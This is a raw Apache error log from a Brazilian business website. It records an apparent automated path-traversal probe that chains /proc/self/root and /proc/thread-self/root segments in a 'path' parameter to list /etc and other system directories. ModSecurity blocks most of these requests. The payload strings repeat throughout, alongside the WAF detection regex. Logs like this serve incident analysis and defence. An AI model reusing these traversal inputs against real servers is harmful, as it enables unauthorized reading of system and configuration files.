https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:43:20.128482 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46032] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:43:41.163398 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:46372] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:44:04.123187 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46740] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:44:27.064493 2026] [proxy_fcgi:error] [pid 29882:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47032] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:44:49.135186 2026] [proxy_fcgi:error] [pid 11816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47334] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:44:57.991709 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:60976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo72dY0UrI5A3LftIxHTgAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:45:04.517699 2026] [mime_magic:error] [pid 26799:tid 140411632822016] (70014)End of file found: [client 74.7.241.31:60464] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib/firmware/intel
[Wed Mar 18 02:45:07.213932 2026] [mime_magic:error] [pid 30077:tid 140411649607424] (70014)End of file found: [client 74.7.243.128:37880] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib
[Wed Mar 18 02:45:11.161357 2026] [proxy_fcgi:error] [pid 29882:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47644] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:45:11.436433 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:37896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo759Y0UrI5A3LftIxHVQAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:45:34.125810 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47988] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:45:56.126541 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48312] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:46:08.978667 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:46946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo8IOoXxyEfFpUF8f8k1QAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:46:18.141847 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48590] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:46:28.714937 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:53848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo8NOoXxyEfFpUF8f8k4gAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:46:30.173017 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.244.43:44384] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo8NgkwaGbbGflqUZDLRgAAANg"]
[Wed Mar 18 02:46:40.125875 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48924] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:46:43.419316 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.228.61:51058] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo8Q9a6ubjKNq_cu4ZNwwAAA08"]
[Wed Mar 18 02:47:01.134167 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49216] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:47:06.983865 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:42746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo8WuyqAr6etmhZHNpv5gAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:47:23.126158 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49528] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:47:28.360504 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:42330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo8cEzinOy1jxa1j4fJxwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:47:30.407985 2026] [core:alert] [pid 15051:tid 140411582465792] [client 74.7.243.128:51036] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/lib/cloud
[Wed Mar 18 02:47:46.129928 2026] [proxy_fcgi:error] [pid 11816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49796] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:48:08.130135 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50102] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:48:31.129895 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50408] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:48:53.145874 2026] [proxy_fcgi:error] [pid 29882:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50694] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:49:02.739942 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:51042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo8zuyqAr6etmhZHNpwOAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:49:06.143546 2026] [mime_magic:error] [pid 30077:tid 140411574073088] (70014)End of file found: [client 74.7.243.128:48204] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/lib/yum/yumdb
[Wed Mar 18 02:49:06.143703 2026] [access_compat:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:48204] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/lib/yum/yumdb
[Wed Mar 18 02:49:15.058464 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50924] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:49:37.126708 2026] [proxy_fcgi:error] [pid 29882:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51130] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:49:54.525455 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:48216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9AuoXxyEfFpUF8f8lfgAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:49:58.391176 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:47662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9Bta6ubjKNq_cu4ZN-gAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:49:59.145436 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51372] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:50:20.506367 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51678] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:50:44.131536 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51948] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:51:08.141074 2026] [proxy_fcgi:error] [pid 15051:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52218] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:51:30.135480 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52462] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:51:40.730008 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:57170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9bNY0UrI5A3LftIxIBQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:51:53.133828 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52738] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:52:00.718715 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:50194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9gNY0UrI5A3LftIxICQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:52:15.048095 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53054] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:52:17.524948 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:60340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9kSmAPhZkrhU8w4km7gAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:52:23.815265 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:58380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9l_u8EFLIOrSqIpvAFwAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:52:37.071756 2026] [proxy_fcgi:error] [pid 15051:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53296] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:52:46.536463 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:33576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9rsdf6f5d65gmYZSI8wAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:52:48.616178 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:40754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9sNY0UrI5A3LftIxIFgAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
